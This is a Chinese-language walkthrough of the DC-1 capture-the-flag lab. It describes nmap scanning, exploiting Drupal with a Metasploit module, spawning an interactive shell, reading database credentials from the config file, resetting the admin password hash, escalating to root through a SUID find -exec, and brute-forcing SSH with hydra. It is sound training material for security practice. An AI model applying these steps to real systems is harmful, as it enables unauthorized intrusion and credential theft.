环境搭建
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
将下载的ova文件导入VMware Workstation15(低版本不支持导入ova文件)
配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段)
靶机开机后是一个登陆页面,无法得知ip
环境
kali:192.168.25.130
渗透
使用 nmap 扫描 192.168.25.0/24 网段存活主机
nmap -sP 192.168.25.0/24
简单分析可知,靶机ip为 192.168.25.129,使用nmap 扫描常用端口
nmap -sV 192.168.25.129
80端口开放,使用浏览器访问查看一下
典型的drupal,由于我们这里是老外搭建的靶机,所以就纯kali渗透即可,启动Metersploit
msfconsole寻找关于 drupal 的模块
search drupal
用2018的测试
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
成功,shell,返回一个shell,用户权限为 www-data
使用python反弹一个交互式shell
python -c “import pty;pty.spawn('/bin/bash')”
进入home目录,发现flag4文件,提示需要提升权限
继续查找敏感文件,发现flag1.txt,内容提示寻找站点的配置文件
Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看
发现了flag2和数据库的账号密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破
我们先进入数据库查看
直接查找默认的Drupal user 表,发现admin用户
置换drupal密码
参考链接:http://drupalchina.cn/node/2128
站点路径下执行
php scripts/password-hash.sh 新密码在数据库中替换
在浏览器直接登录,发现flag3
flag3提示,提权并提示 -exec,想到suid提权 find 命令
使用命令查看 suid 权限的可执行二进制程序
find / -perm -4000 2>/dev/null发现find命令
使用命令测试,发现为root权限
touch 666
find / -name 666 -exec "whoami" \;在root 下发现flag文件
至此,完成渗透。此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破
-l 指定用户名
-P 加载密码字典(自定义)
ssh://ip 指定使用协议和ip地址
SSH连接登录
总结一下,DC-1还是比较容易的,主要是练习对工具的使用
